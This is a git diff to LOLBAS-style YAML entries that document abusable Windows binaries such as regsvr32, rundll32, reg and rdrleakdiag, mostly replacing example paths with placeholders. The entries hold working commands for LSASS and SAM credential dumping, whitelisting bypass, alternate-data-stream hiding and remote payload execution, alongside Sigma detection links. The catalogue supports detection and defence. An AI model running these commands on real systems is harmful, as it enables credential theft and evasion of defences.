Description: Used in Windows for managing ODBC connections -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: odbcconf /a {REGSVR c:\test\test.dll} - Description: Execute DllREgisterServer from DLL specified. - Usecase: Execute dll file using technique that can evade defensive counter measures + - Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}} + Description: Execute DllRegisterServer from DLL specified. + Usecase: Execute a DLL file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 @@ -14,7 +14,7 @@ Commands: Tags: - Execute: DLL - Command: | - odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" + odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" Description: Install a driver and load the DLL. Requires administrator privileges. Usecase: Execute dll file using technique that can evade defensive counter measures @@ -24,7 +24,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: odbcconf -f file.rsp + - Command: odbcconf -f {PATH:.rsp} Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 7162943..bd3543c 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -1,10 +1,10 @@ --- Name: Pcalua.exe Description: Program Compatibility Assistant -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: pcalua.exe -a calc.exe + - Command: pcalua.exe -a {PATH:.exe} Description: Open the target .EXE using the Program Compatibility Assistant. Usecase: Proxy execution of binary Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: pcalua.exe -a \\server\payload.dll + - Command: pcalua.exe -a {PATH_SMB:.dll} Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file Category: Execute @@ -23,7 +23,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java + - Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files Category: Execute diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index cf36bb6..11255a0 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -1,10 +1,10 @@ --- Name: Pcwrun.exe Description: Program Compatibility Wizard -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Pcwrun.exe c:\temp\beacon.exe + - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe} Description: Open the target .EXE file with the Program Compatibility Wizard. Usecase: Proxy execution of binary Category: Execute diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 0ef714b..3b66b2c 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -1,7 +1,7 @@ --- Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. -Author: 'Derek Johnson' +Author: Derek Johnson Created: 2020-08-12 Commands: - Command: pktmon.exe start --etw @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml - IOC: .etl files found on system @@ -30,4 +28,3 @@ Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ Acknowledgement: - Person: Derek Johnson - Handle: '' diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 5c45cce..cad47a8 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -4,7 +4,7 @@ Description: Used for installing drivers Author: Hai vaknin (lux) Created: 2020-12-25 Commands: - - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + - Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf} Description: Used for installing drivers Usecase: Add malicious driver Category: Execute diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 0898d43..0424de8 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -4,16 +4,16 @@ Description: File is used for executing Browser applications Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Presentationhost.exe C:\temp\Evil.xbap + - Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap} Description: Executes the target XAML Browser Application (XBAP) file - Usecase: Execute code within xbap files + Usecase: Execute code within XBAP files Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: XBAP - - Command: Presentationhost.exe https://example.com/payload + - Command: Presentationhost.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index 9edacb8..b3fed16 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -1,24 +1,24 @@ --- Name: Print.exe Description: Used by Windows to send files to the printer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe + - Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe} Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe - Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe + - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe} + Description: Copy file from source to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe + - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe} Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml - IOC: Print.exe retrieving files from internet diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index cd9f68d..d05c4cb 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -1,10 +1,10 @@ --- Name: PrintBrm.exe Description: Printer Migration Command-Line Tool -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-06-21 Commands: - - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + - Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip} Description: Create a ZIP file from a folder in a remote drive Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file Category: Download @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + - Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder} Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 16d6a11..fe6fef7 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -5,7 +5,7 @@ Author: Grzegorz Tworek Created: 2023-06-30 Commands: - Command: provlaunch.exe LOLBin - Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. "reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0" and "reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe". Registry keys are deleted after successful execution.' + Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.' Usecase: Executes arbitrary command Category: Execute Privileges: Administrator diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index 1d6d78a..1fe6114 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -4,7 +4,7 @@ Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko Created: 2020-06-27 Commands: - - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 + - Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. Usecase: Can be used to take screenshots of the user environment Category: Reconnaissance @@ -14,8 +14,6 @@ Commands: Full_Path: - Path: c:\windows\system32\psr.exe - Path: c:\windows\syswow64\psr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml - IOC: psr.exe spawned diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 5ddc561..2dc5885 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -1,10 +1,10 @@ --- Name: Rasautou.exe Description: Windows Remote Access Dialer -Author: 'Tony Lambert' +Author: Tony Lambert Created: 2020-01-10 Commands: - - Command: rasautou -d powershell.dll -p powershell -a a -e e + - Command: rasautou -d {PATH:.dll} -p export_name -a a -e e Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Usecase: Execute DLL code Category: Execute diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index 6fa5d38..65ec192 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml @@ -4,21 +4,21 @@ Description: Microsoft Windows resource leak diagnostic tool Author: 'John Dwyer' Created: 2022-05-18 Commands: - - Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1 + - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump process by PID. Category: Dump Privileges: User MitreID: T1003 OperatingSystem: Windows - - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1 + - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump LSASS process. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows - - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap + - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump LSASS process mutliple times. Category: Dump @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: c:\windows\system32\rdrleakdiag.exe - Path: c:\Windows\SysWOW64\rdrleakdiag.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index fa6a9fc..8fbce7b 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -1,17 +1,17 @@ --- Name: Reg.exe Description: Used to manipulate the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg + - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Usecase: Hide/plant registry information in Alternate data stream for later use Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak + - Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak} Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material Usecase: Dump credentials from the Security Account Manager (SAM) Category: Credentials @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index a5314d1..28c3b3d 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -1,11 +1,11 @@ --- Name: Regasm.exe Description: Part of .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regasm.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - - Command: regasm.exe /U AllTheThingsx64.dll + - Command: regasm.exe /U {PATH:.dll} Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index fec34d0..d55399d 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -1,17 +1,17 @@ --- Name: Regedit.exe Description: Used by Windows to manipulate registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey + - Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. Usecase: Hide registry data in alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: regedit C:\ads\file.txt:regfile.reg + - Command: regedit {PATH_ABSOLUTE}:regfile.reg Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream Category: ADS @@ -20,8 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\regedit.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - IOC: regedit.exe reading and writing to alternate data stream diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index c378df8..d8f1c90 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -1,10 +1,10 @@ --- Name: Regini.exe Description: Used to manipulate the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2020-07-03 Commands: - - Command: regini.exe newfile.txt:hidden.ini + - Command: regini.exe {PATH}:hidden.ini Description: Write registry keys from data inside the Alternate data stream. Usecase: Write to registry Category: ADS @@ -14,8 +14,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index e2f2b62..2b56957 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -1,10 +1,10 @@ --- Name: Register-cimprovider.exe Description: Used to register new wmi providers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Register-cimprovider -path "C:\folder\evil.dll" + - Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll} Description: Load the target .DLL. Usecase: Execute code within dll file Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml - IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index b1fde20..0f7ed88 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -1,11 +1,11 @@ --- Name: Regsvcs.exe Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regsvcs.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regsvcs.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 979d24d..10fa857 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -1,10 +1,10 @@ --- Name: Regsvr32.exe Description: Used by Windows to register dlls -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: AWL Bypass @@ -14,7 +14,7 @@ Commands: Tags: - Execute: SCT - Execute: Remote - - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: AWL Bypass @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: Execute @@ -33,7 +33,7 @@ Commands: Tags: - Execute: SCT - Execute: Remote - - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: Execute diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index af90c13..4cd6b86 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -1,18 +1,18 @@ --- Name: Replace.exe Description: Used to replace file with another file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: replace.exe C:\Source\File.cab C:\Destination /A - Description: Copy file.cab to destination + - Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A + Description: Copy .cab file to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A - Description: Download/Copy bar.exe to outdir + - Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A + Description: Download/Copy executable to specified folder Usecase: Download file Category: Download Privileges: User @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe -Code_Sample: - - Code: Detection: - IOC: Replace.exe retrieving files from remote server - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index f20ddd2..db621d5 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -1,7 +1,7 @@ --- Name: Rpcping.exe Description: Used to verify rpc connection -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml Resources: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d1941d1..9061548 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -1,20 +1,20 @@ --- Name: Rundll32.exe Description: Used by Windows to execute dll files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe AllTheThingsx64,EntryPoint - Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. - Usecase: Execute dll file + - Command: rundll32.exe {PATH},EntryPoint + Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute. + Usecase: Execute DLL file Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint - Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. + - Command: rundll32.exe {PATH_SMB:.dll},EntryPoint + Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute. Usecase: Execute DLL from SMB share. Category: Execute Privileges: User @@ -23,16 +23,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet Category: Execute @@ -41,7 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + - Command: rundll32 "{PATH}:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream Category: ADS diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index eafab60..0351b3a 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -4,7 +4,7 @@ Description: Launcher process Author: Grzegorz Tworek Created: 2022-12-13 Commands: - - Command: runexehelper.exe c:\windows\system32\calc.exe + - Command: runexehelper.exe {PATH_ABSOLUTE:.exe} Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.' Usecase: Executes arbitrary code Category: Execute diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 40b17aa..e4a8e06 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,11 +1,11 @@ --- Name: Runonce.exe Description: Executes a Run Once Task that has been configured in the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Runonce.exe /AlternateShellStartup - Description: Executes a Run Once Task that has been configured in the registry + Description: Executes a Run Once Task that has been configured in the registry. Usecase: Persistence, bypassing defensive counter measures Category: Execute Privileges: Administrator @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index cd8d443..667b384 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,11 +1,11 @@ --- Name: Runscripthelper.exe Description: Execute target PowerShell script -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Description: Execute the PowerShell script named test.txt + - Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder} + Description: Execute the PowerShell script with .txt extension Usecase: Bypass constrained language mode and execute Powershell script Category: Execute Privileges: User @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: 